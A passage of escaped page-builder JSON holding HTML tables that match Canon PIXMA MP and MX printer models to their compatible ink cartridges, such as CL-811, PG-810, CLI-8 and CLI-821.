width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td 